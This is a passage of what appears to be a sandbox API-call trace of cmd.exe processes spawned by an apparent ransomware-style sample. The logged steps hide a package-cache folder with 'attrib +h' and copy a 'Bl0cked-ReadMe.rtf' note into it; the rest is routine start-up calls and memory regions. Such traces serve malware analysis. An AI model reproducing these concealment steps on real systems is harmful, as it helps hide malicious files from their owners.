lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12effc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessInformation=0x12effc*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa08, dwThreadId=0xfb4)) returned 1 [0206.240] CloseHandle (hObject=0x50) returned 1 [0206.240] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.240] GetEnvironmentStringsW () returned 0x2c2d50* [0206.240] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.240] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0206.523] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12eef0 | out: lpExitCode=0x12eef0*=0x0) returned 1 [0206.523] CloseHandle (hObject=0x4c) returned 1 [0206.523] _vsnwprintf (in: _Buffer=0x12f038, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eefc | out: 
_Buffer="00000000") returned 8 [0206.523] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.523] GetEnvironmentStringsW () returned 0x2c2d50* [0206.523] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.523] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.523] GetEnvironmentStringsW () returned 0x2c2d50* [0206.523] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.523] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef54 | out: lpAttributeList=0x12ef54) [0206.523] GetConsoleTitleW (in: lpConsoleTitle=0x12f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.524] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0206.524] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.524] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.524] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.524] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.524] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.524] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.524] GetConsoleTitleW (in: lpConsoleTitle=0x12f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.524] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f01c | out: lpAttributeList=0x12ef54, lpSize=0x12f01c) returned 1 [0206.525] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef54, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f014, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef54, 
lpPreviousValue=0x0) returned 1 [0206.525] GetStartupInfoW (in: lpStartupInfo=0x12ef10 | out: lpStartupInfo=0x12ef10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0206.525] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.525] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12efb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12effc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessInformation=0x12effc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd88, dwThreadId=0x720)) returned 1 [0206.526] CloseHandle (hObject=0x4c) returned 1 [0206.526] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.526] GetEnvironmentStringsW () returned 0x2c3790* [0206.526] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.527] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0206.657] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eef0 | out: lpExitCode=0x12eef0*=0x0) returned 1 [0206.657] CloseHandle (hObject=0x50) returned 1 [0206.657] _vsnwprintf (in: _Buffer=0x12f038, _BufferCount=0x13, _Format="%08X", 
_ArgList=0x12eefc | out: _Buffer="00000000") returned 8 [0206.657] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.657] GetEnvironmentStringsW () returned 0x2c3790* [0206.657] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.657] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.657] GetEnvironmentStringsW () returned 0x2c3790* [0206.657] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.657] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef54 | out: lpAttributeList=0x12ef54) [0206.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0206.657] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0206.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0206.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0206.658] _get_osfhandle (_FileHandle=0) returned 0x3 [0206.658] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0206.658] SetConsoleInputExeNameW () returned 0x1 [0206.658] GetConsoleOutputCP () returned 0x1b5 [0206.658] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0206.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.658] exit (_Code=0) Process: id = "495" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30297 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30298 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 30299 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30304 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 30305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30365 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30366 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30367 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30368 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30369 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 30370 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30371 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30372 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30373 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30374 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30375 start_va = 0x76b40000 end_va = 0x76c08fff entry_point 
= 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30376 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30377 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30378 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30379 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 30380 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30381 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30382 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30383 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30384 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30385 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 30386 start_va 
= 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30387 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30388 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 691 os_tid = 0x978 [0205.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f904 | out: lpSystemTimeAsFileTime=0x12f904*(dwLowDateTime=0xaf49e020, dwHighDateTime=0x1d440a9)) [0205.488] GetCurrentProcessId () returned 0xf2c [0205.488] GetCurrentThreadId () returned 0x978 [0205.488] GetTickCount () returned 0x39e03 [0205.488] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8fc | out: lpPerformanceCount=0x12f8fc*=26227737553) returned 1 [0205.489] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.489] __set_app_type (_Type=0x1) [0205.489] __p__fmode () returned 0x76b331f4 [0205.489] __p__commode () returned 0x76b331fc [0205.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.489] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.489] GetCurrentThreadId () returned 0x978 [0205.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x978) returned 0x38 [0205.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.489] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.490] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f894 | out: phkResult=0x12f894*=0x0) returned 0x2 [0205.490] VirtualQuery (in: lpAddress=0x12f8cb, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.490] GetConsoleOutputCP () returned 0x1b5 [0205.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.491] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.491] GetEnvironmentStringsW () returned 0x250190* [0205.491] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0205.491] GetEnvironmentStringsW () returned 0x250190* [0205.491] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0205.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0205.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0xb8, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegCloseKey (hKey=0x40) returned 0x0 [0205.492] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegCloseKey (hKey=0x40) returned 0x0 [0205.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.492] srand (_Seed=0x5b8863a7) [0205.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" [0205.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" [0205.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.493] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.493] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.493] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.493] _wcsicmp 
(_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.493] GetEnvironmentStringsW () returned 0x2522e0* [0205.493] FreeEnvironmentStringsW (penv=0x2522e0) returned 1 [0205.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.494] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.494] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.494] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5d0, lpFilePart=0x12f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5cc*="Desktop") returned 0x18 [0205.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.494] FindFirstFileW (in: 
lpFileName="C:\\Users", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.494] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.495] GetEnvironmentStringsW () returned 0x252b00* [0205.495] FreeEnvironmentStringsW (penv=0x252b00) returned 1 [0205.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.495] GetConsoleOutputCP () returned 0x1b5 [0205.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.495] GetUserDefaultLCID () returned 0x409 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") 